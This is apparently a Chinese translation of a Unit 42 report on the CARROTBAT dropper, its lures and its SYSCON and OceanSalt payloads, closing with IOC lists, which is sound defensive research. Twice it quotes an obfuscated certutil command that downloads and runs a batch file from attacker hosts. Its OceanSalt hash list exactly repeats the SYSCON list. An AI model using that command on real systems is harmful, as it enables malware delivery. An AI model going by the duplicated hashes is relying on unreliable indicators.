CARROTBAT家族針對東南亞地區發起攻擊
Unit 42近期發現了一項針對與韓國和朝鮮地區進行的釣魚活動,釣魚內容圍繞一系列主題展開,主要包括:加密貨幣,加密貨幣交易和政治事件。根據被投遞的惡意載荷中所包含的有關資訊,Unit 42將這個惡意軟體家族命名為了CARROTBAT。
CARROTBAT家族的樣本最早在2017年12月的一次攻擊中被發現的,此次攻擊是針對英國政府機構展開的,主要利用了SYSCON家族惡意軟體,儘管沒有明確證據表明CARROTBAT在攻擊中被使用,但是研究人員還是通過攻擊裝置的行為重疊來確認出了CARROTBAT家族,並發現了它與SYSCON家族系列軟體的聯絡。而此次攻擊事件的主角SYSCON是一款簡單的遠端訪問木馬(RAT),它使用檔案傳輸協議(FTP)進行網路通訊,具體報道見於 ofollow,noindex" target="_blank">https://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/。
迄今為止,一共識別出了29種不同的CARROTBAT樣本,其中包含12種已確認的不同誘餌檔案。這些樣本於今年3月開始出現,在過去的3個月內進行了大量的活動。與先前投遞的SYSCON家族惡意軟體不同,新的攻擊活動投遞了OceanSalt( https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf)家族惡意軟體。我們將CARROTBAT及其投遞的相關載荷合併稱之為Fractured Block。
攻擊過程
2017年12月13日,yuri.sidorav @yandex [.]ru向英國政府機構內的高階人員傳送了一封魚叉釣魚郵件。此電子郵件的主題是“我們會在沒有先決條件的情況下與朝鮮對話”,此郵件的附件檔案也使用了同樣的命名方式。
在附件Word中顯示瞭如下內容:
美國將“無條件地”與朝鮮對話
文章主要討論了美國與朝鮮之間的外交關係,並且引用了NKNews[.]org當天釋出的文章(文章連結為: https://www.nknews.org/2017/12/u-s-would-talk-with-north-korea-without-precondition-tillerson/ )。被引用的文章內容為:
附件文件利用DDE漏洞(漏洞介紹: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/)執行了以下程式碼:
https://researchcenter.paloaltonetworks.com/2018/11/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/
DDE漏洞首次在2017年5月被利用於惡意攻擊。攻擊樣本中包含下載名為0_31.doc的遠端可執行檔案的命令,檔案被下載後以AAA.exe的檔名形式命名,並放在在受害者的%TEMP%目錄中。
被劃定到SYSCON家族的惡意載荷通過FTP伺服器與ftp.bytehost31[.]org via這個惡意伺服器進行連線,以接收遠端控制命令。
通過對惡意樣本中的域名881.000webhostapp[.]com進行關聯,又關聯出了一批樣本,其中包括KONNI惡意軟體系列樣本和4個CARROTBAT惡意軟體系列樣本(64位可執行檔案)。根據特徵進行篩選,最終篩選出了29個不同樣本。
Fractured Block攻擊
迄今為止,所有的CARROTBAT樣本都是包含在Fractured Block攻擊裡的。CARROTBAT用於投遞載荷來幫助攻擊者投遞並開啟一個嵌入式誘餌檔案,然後執行一個命令,該命令將在目標機器上下載並執行一個有效負載。此惡意軟體支援以下11種誘餌文件檔案格式:
.doc .docx .eml .hwp .jpg .pdf .png .ppt .pptx .xls .xlsx
在開啟嵌入式誘餌文件後,會在系統上執行以下混淆命令:
C: && cd %TEMP% && c^e^r^tutil -urlca^che -spl^it -f https://881.000webhostapp[.]com/1.txt && ren 1.txt 1.bat && 1.bat && exit
此命令將嘗試通過Microsoft Windows內建的certutil實用程式下載並執行遠端檔案。
通過對根據行為判別所找到的29個樣本的編譯時間戳進行研究,發現它們均在2018年3月到2018年9月之間,其中的11個被用於了實際的攻擊過程。樣本的編譯時間戳如下圖所示:
針對韓國受害者的大多數誘餌檔案都有與加密貨幣的主題相關。在其中的一個案例中,誘餌檔案包含了在COINVIL工作的個人名片,該組織宣佈計劃於2018年5月在菲律賓建立加密貨幣交易所。其他誘餌主題包括時事政治事件,如美國和朝鮮之間的關係,以及美國總統唐納德特朗普訪問新加坡峰會。CARROTBAT所投遞的惡意載荷各不相同,在2018年3月到2018年7月期間,可以觀察到所投遞的多個SYSCON惡意樣本,這些樣本通過FTP與以下主機進行C2通訊:
ftp.byethost7[.]com ftp.byethost10[.]com files.000webhost[.]com
從2018年6月開始,我們觀察到CARROTBAT開始投遞OceanSalt惡意軟體。在撰寫本文時,這些樣本仍處於活動狀態,並與61.14.210[.]72:7117進行C2通訊。
與其他威脅活動的關聯
CARROTBAT和KONNI惡意軟體之間存在一些伺服器重疊。KONNI是一種遠端訪問木馬,已經活躍了四年之久,具有廣泛的功能,通常利用000webhost等免費網路託管服務提供商的伺服器作為其C2地址。在撰寫本文時,這個特定的惡意軟體系列尚未被歸類為一個家族,但是該軟體的攻擊目標一直集中在東南亞地區。
上文反覆提到的另一種關聯是SYSCON惡意軟體。這個惡意軟體首次在2017年10月被報道,並且已經觀察到了攻擊中提供了與朝鮮有關的誘餌檔案。此款惡意軟體通常比較簡單,利用遠端FTP伺服器進行C2通訊。在下面的惡意活動關聯圖中,黃色的表示KONNI,紫色的表示SYSCON。
該家族與OceanSalt惡意軟體有效載荷也可能有一定關聯。McAfee在2018年10月首次進行了攻擊報道,受害者包括韓國、美國和加拿大。與McAfee報告中列出的樣本資訊一樣,在Fractured Block 攻擊中觀察到的OceanSalt樣本使用與Comment Crew(又名APT1)相同的程式碼,但是研究人員認為這些相似的程式碼是錯誤的標誌。Comment Crew使用的惡意軟體已經活躍了多年,因此研究人員表示此次活動與Crew活動的關聯性存疑。相關威脅活動的時間重疊表:
結論
CARROTBAT是識別Fractured Block攻擊活動的關鍵。通過尋找CARROTBAT,我們能夠找到相關的OceanSalt,SYSCON和KONNI活動。由於這些活動具備一些特徵重疊,因此我們懷疑這種威脅活動可能是由同一個攻擊組織發起的。但是,目前沒有確鑿證據。CARROTBAT惡意軟體是一種較為獨特的載荷投遞器,雖然它支援各種型別的誘餌檔案,並採用基本的命令混淆,但它並不複雜。
CARROTBAT技術分析
樣本資訊為:
MD5:3e4015366126dcdbdcc8b5c508a6d25c
SHA1:f459f9cfbd10b136cafb19cbc233a4c8342ad984
SHA256:aef92be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e59ba62b7091de
檔案型別:PE32可執行檔案(GUI)Intel 80386,適用於MS Windows
編譯時間戳 2018-09-05 00:17:22 UTC
執行時,惡意軟體將讀取自身的最後8個位元組。這些位元組包括兩個DWORD,它們既包含嵌入的誘餌文件的長度,也包含它的檔案型別。
根據這些收集到的資訊,CARROTBAT減去先前檢索的8個位元組後繼續讀取自身的結尾。資料包含整個嵌入式誘餌文件,並寫入與原始惡意軟體相同的目錄和檔名。但是會根據先前檢索的檔案型別值更改副檔名,對應值為:
在此樣本中使用了.hwp副檔名的文件作為誘餌文件。在誘餌檔案被放入到磁碟後,它將在一個新程序中被開啟。隨後會給受害者顯示這個.hwp誘餌文件:BKN Bank加密貨幣交易的白皮書。
在顯示此文件後,惡意軟體將繼續在新程序中執行以下命令:
C: && cd %TEMP% && c^e^r^tutil -urlca^che -spl^it -f http://s8877.1apps[.]com/vip/1.txt && ren 1.txt 1.bat && 1.bat && exit
此命令將使用內建的Microsoft Windows certutil命令下載遠端檔案。在這個樣本中,將檢索以下指令碼:
該指令碼會檢查受害者的作業系統,並使用certutil可執行檔案再次下載相應的有效負載。
在本樣本中,有效載荷通過base64進行編碼,通過certutil進行解碼。惡意載荷是一個CAB檔案,在解壓縮後,惡意軟體會執行提取的install.bat指令碼,最後刪除原始檔案並退出。
下載的CAB檔案資訊為:
MD5:a943e196b83c4acd9c5ce13e4c43b4f4
SHA1:e66e416f300c7efb90c383a7630c9cfe901ff9fd
SHA256:cfe436c1f0ce5eb7ac61b32cd073cc4e4b21d5016ceef77575bef2c2783c2d62
檔案型別:Microsoft Cabinet歸檔資料,共181248位元組,3個檔案
上文提到的所刪除的檔案共有三個,分別是:
- INSTALL.BAT(用於安裝批處理指令碼,負責將其他檔案複製到C: Users Public Downloads並設定Run登錄檔項以確保永續性。它還負責在退出之前刪除任何原始檔案。)
- DrvUpdate.dll(OceanSalt惡意軟體)
- winnet.ini(C2資訊)
C2資訊在外部winnet.ini檔案中儲存,並使用增量的XOR金鑰進行編碼。用Python編寫的以下函式可解碼此檔案:
解碼後,研究人員發現此OceanSalt病毒嘗試通過埠7117與61.14.210 [.] 72進行通訊。
IOC/">IOC
CARROTBAT樣本
d34aabf20ccd93df9d43838cea41a7e243009a3ef055966cb9dea75d84b2724d 8b6b4a0e0945c6daf3ebc8870e3bd37e54751f95162232d85dc0a0cc8bead9aa 26fc6fa6acc942d186a31dc62be0de5e07d6201bdff5d7b2f1a7521d1d909847 e218b19252f242a8f10990ddb749f34430d3d7697cbfb6808542f609d2cbf828 824f79a8ee7d8a23a0371fab83de44db6014f4d9bdea90b47620064e232fd3e3 70106ebdbf4411c32596dae3f1ff7bf192b81b0809f8ed1435122bc2a33a2e22 87c50166f2ac41bec7b0f3e3dba20c7264ae83b13e9a6489055912d4201cbdfc ac23017efc19804de64317cbc90efd63e814b5bb168c300cfec4cfdedf376f4f d965627a12063172f12d5375c449c3eef505fde1ce4f5566e27ef2882002b5d0 7d443434c302431734caf1d034c054ad80493c4c703d5aaeafa4a931a496b2ae 1142dcc02b9ef34dca2f28c22613a0489a653eb0aeafe1370ca4c00200d479e0 337b8c2aac80a44f4e7f253a149c65312bc952661169066fe1d4c113348cc27b 92b45e9a3f26b2eef4a86f3dae029f5821cffec78c6c64334055d75dbf2a62ef 42e18ef3aaadac5b40a37ec0b3686c0c2976d65c978a2b685fefe50662876ded ba78f0a6ce53682942e97b5ad7ec76a2383468a8b6cd5771209812b6410f10cb dca9bd1c2d068fc9c84a754e4dcf703629fbe2aa33a089cb50a7e33e073f5cea 7d8376057a937573c099e3afe2d8e4b8ec8cb17e46583a2cab1a4ac4b8be1c97 3cbccb059225669dcfdc7542ce28666e0b1a227714eaf4b16869808bffe90b96 aef92be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e59ba62b7091de 2547b958f7725539e9bba2a1852a163100daa1927bb621b2837bb88007857a48 6c591dddd05a2462e252997dc9d1ba09a9d9049df564d00070c7da36e526a66a 22b16fa7af7b51880faceb33dd556242331daf7b7749cabd9d7c9735fb56aa10 3869c738fa80b1e127f97c0afdb6c2e1c15115f183480777977b8422561980dd ba100e7bac8672b9fd73f2d0b7f419378f81ffb56830f6e27079cb4a064ba39a e527ade24beacb2ef940210ba9acb21073e2b0dadcd92f1b8f6acd72b523c828 9fa69bdc731015aa7bdd86cd311443e6f829fa27a9ba0adcd49fa773fb5e7fa9 ffd1e66c2385dae0bb6dda186f004800eb6ceaed132aec2ea42b1ddcf12a5c4e e3b45b2e5d3e37f8774ae22a21738ae345e44c07ff58f1ab7178a3a43590fddd a0f53abde0d15497776e975842e7df350d155b8e63d872a914581314aaa9c1dc
SYSCON 載荷樣本
5a2c53a20fd66467e87290f5845a5c7d6aa8d460426abd30d4a6adcffca06b8b fceceb104bed6c8e85fff87b1bf06fde5b4a57fe7240b562a51727a37034f659 fa712f2bebf30592dd9bba4fc3befced4c727b85a036550fc3ac70d1965f8de5 da94a331424bc1074512f12d7d98dc5d8c5028821dfcbe83f67f49743ae70652 2efdd25a8a8f21c661aab2d4110cd7f89cf343ec6a8674ff20a37a1750708f27 62886d8b9289bd92c9b899515ff0c12966b96dd3e4b69a00264da50248254bb7 f27d640283372eb805df794ae700c25f789d77165bb98b7174ee03a617a566d4 0bb099849ed7076177aa8678de65393ef0d66e026ad5ab6805c1c47222f26358 f4c00cc0d7872fb756e2dc902f1a22d14885bf283c8e183a81b2927b363f5084 e8381f037a8f70d8fc3ee11a7bec98d6406a289e1372c8ce21cf00e55487dafc 1c8351ff968f16ee904031f6fba8628af5ca0db01b9d775137076ead54155968 2da750b50ac396a41e99752d791d106b686be10c27c6933f0d3afe762d6d0c48 5d1388c23c94489d2a166a429b8802d726298be7eb0c95585f2759cebad040cf 0490e7d24defc2f0a4239e76197f1cba50e7ce4e092080d2f7db13ea0f88120b
OceanSalt 載荷樣本
5a2c53a20fd66467e87290f5845a5c7d6aa8d460426abd30d4a6adcffca06b8b fceceb104bed6c8e85fff87b1bf06fde5b4a57fe7240b562a51727a37034f659 fa712f2bebf30592dd9bba4fc3befced4c727b85a036550fc3ac70d1965f8de5 da94a331424bc1074512f12d7d98dc5d8c5028821dfcbe83f67f49743ae70652 2efdd25a8a8f21c661aab2d4110cd7f89cf343ec6a8674ff20a37a1750708f27 62886d8b9289bd92c9b899515ff0c12966b96dd3e4b69a00264da50248254bb7 f27d640283372eb805df794ae700c25f789d77165bb98b7174ee03a617a566d4 0bb099849ed7076177aa8678de65393ef0d66e026ad5ab6805c1c47222f26358 f4c00cc0d7872fb756e2dc902f1a22d14885bf283c8e183a81b2927b363f5084 e8381f037a8f70d8fc3ee11a7bec98d6406a289e1372c8ce21cf00e55487dafc 1c8351ff968f16ee904031f6fba8628af5ca0db01b9d775137076ead54155968 2da750b50ac396a41e99752d791d106b686be10c27c6933f0d3afe762d6d0c48 5d1388c23c94489d2a166a429b8802d726298be7eb0c95585f2759cebad040cf 0490e7d24defc2f0a4239e76197f1cba50e7ce4e092080d2f7db13ea0f88120b
URL
https://881.000webhostapp[.]com/1.txt http://attach10132.1apps[.]com/1.txt https://071790.000webhostapp[.]com/1.txt https://vnik.000webhostapp[.]com/1.txt https://7077.000webhostapp[.]com/vic/1.txt http://a7788.1apps[.]com/att/1.txt http://s8877.1apps[.]com/vip/1.txt http://hanbosston.000webhostapp[.]com/1.txt http://bluemountain.1apps[.]com/1.txt https://www.webmail-koryogroup[.]com/keep/1.txt http://filer1.1apps[.]com/1.txt ftp.byethost7[.]com ftp.byethost10[.]com files.000 webhost[.]com61.14.210[.]72:7117